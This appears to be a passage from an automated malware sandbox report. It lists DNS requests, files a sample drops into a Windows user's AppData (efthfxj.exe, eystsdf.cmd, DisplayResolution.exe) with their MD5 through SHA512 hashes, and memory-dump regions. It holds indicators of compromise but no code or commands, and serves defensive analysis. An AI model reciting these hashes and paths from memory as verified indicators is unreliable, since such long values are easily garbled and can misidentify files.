              • 8.8.8.8:53
                Domain: tse1.mm.bing.net
                Protocol: dns
                62 B
                170 B
                1
                1

                DNS Request

                tse1.mm.bing.net

                DNS Response

                150.171.28.10
                150.171.27.10

              • 8.8.8.8:53
                66.112.168.52.in-addr.arpa
                dns
                72 B
                146 B
                1
                1

                DNS Request

                66.112.168.52.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\efthfxj.exe.log

                Filesize

                522B

                MD5

                8334a471a4b492ece225b471b8ad2fc8

                SHA1

                1cb24640f32d23e8f7800bd0511b7b9c3011d992

                SHA256

                5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

                SHA512

                56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

              • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe

                Filesize

                614KB

                MD5

                88696cf17417a2339b63f9452404c839

                SHA1

                2123ca0e3764ba65e421d3b5dd7453da955d36f2

                SHA256

                a5f629e62e8012c0ead81b462bc05ec9d20395af3121f87961f9d2dfde908895

                SHA512

                a4236f6d52b985420dc733998842815fd24f12236bdbf3b885ed9a15c0d4815dec439cf919925b4b903ac158aba1ba2a8bf9eff20af7134d2e4edbce226f7931

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmbjd34e.ylk.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\tmp35BC.tmp

                Filesize

                1KB

                MD5

                7f90f475aa13b8540625a0f2f6c5cb87

                SHA1

                aa27ff559a0ceb702c9acd3215fa9d8f1bf4ad18

                SHA256

                aad12eaef3d9e22bbde72db89ca3dbdd7adf278042ea0ecbb9013302993481a0

                SHA512

                0f484824f1f72abc0f3adc20473e2f20afee0a17cce13bc04a5ba1f3a64b514e0e87dafbd4adb4fe664dd28c6d533e1f264e15fca93d68965aa99784f526e6f2

              • C:\Users\Admin\AppData\Roaming\efthfxj.exe

                Filesize

                251KB

                MD5

                dcb591d1fc03274934709e24b502d719

                SHA1

                9d4172d007347a9aa54b48cb5a214a792ad03708

                SHA256

                c7e67928407dc0d2fe2a61e10e2f97104986770b6ba6e59f8faa7b6fcc595028

                SHA512

                1d6748bdd0bbfbe4d1f15dde0af015fb08814ffc3360b215d4f56844b15ae1d4b29ade922678439c3a07f1fa41da287a1054b0eb5853a761ae2fabb4b08b2800

              • C:\Users\Admin\AppData\Roaming\efthfxj.sfx.exe

                Filesize

                474KB

                MD5

                642a150be5bbed12c85dff794b955c01

                SHA1

                115de36f192e2bb10ec7c2c8bba9bf3dd639b461

                SHA256

                ded2b1a499ba8ac097361b01b1e56bdaa67769c0b7130489af489bef58cb5dfc

                SHA512

                d4a8249bc53bd070bfb8c0cdd703980ac4b12e0a0354a31333d7bf0af089edc1317c3005e99cdd3247b883ce72d10158e928d54664941010ee884fb4a5b1ce42

              • C:\Users\Admin\AppData\Roaming\eystsdf.cmd

                Filesize

                18KB

                MD5

                fa0fdc18cccb4a2fb162362848d10d73

                SHA1

                9ccab8577c310e19e1299fb7fcad538c72a36420

                SHA256

                c3f004c34695080e75df6dccc39dae9e269eba7164aa0f95b9964078973f3736

                SHA512

                fcce03713d22d8831cb8f792c9e367aeb4d3714ffb89f148f2b64ae32bb066f7ab0b5ea58778309a86584af8169a75bb7325ba6505567881bd330cdead222fd3

              • memory/1816-14-0x00007FF9BB040000-0x00007FF9BBB01000-memory.dmp

                Filesize

                10.8MB

              • memory/1816-23-0x00007FF9BB040000-0x00007FF9BBB01000-memory.dmp

                Filesize

                10.8MB

              • memory/1816-2-0x00007FF9BB043000-0x00007FF9BB045000-memory.dmp

                Filesize

                8KB

              • memory/1816-13-0x00007FF9BB040000-0x00007FF9BBB01000-memory.dmp

                Filesize

                10.8MB

              • memory/1816-12-0x000001A4EE5E0000-0x000001A4EE602000-memory.dmp

                Filesize

                136KB

              • memory/4852-54-0x0000000000400000-0x0000000000412000-memory.dmp

                Filesize

                72KB

              • memory/5116-47-0x0000000000DA0000-0x0000000000DE8000-memory.dmp

                Filesize

                288KB

              • memory/5116-48-0x0000000003180000-0x0000000003186000-memory.dmp

                Filesize

                24KB

              • memory/5116-49-0x00000000031B0000-0x00000000031F2000-memory.dmp

                Filesize

                264KB

              • memory/5116-50-0x0000000005950000-0x00000000059EC000-memory.dmp

                Filesize

                624KB

              • memory/5116-51-0x00000000031F0000-0x00000000031F6000-memory.dmp

                Filesize

                24KB
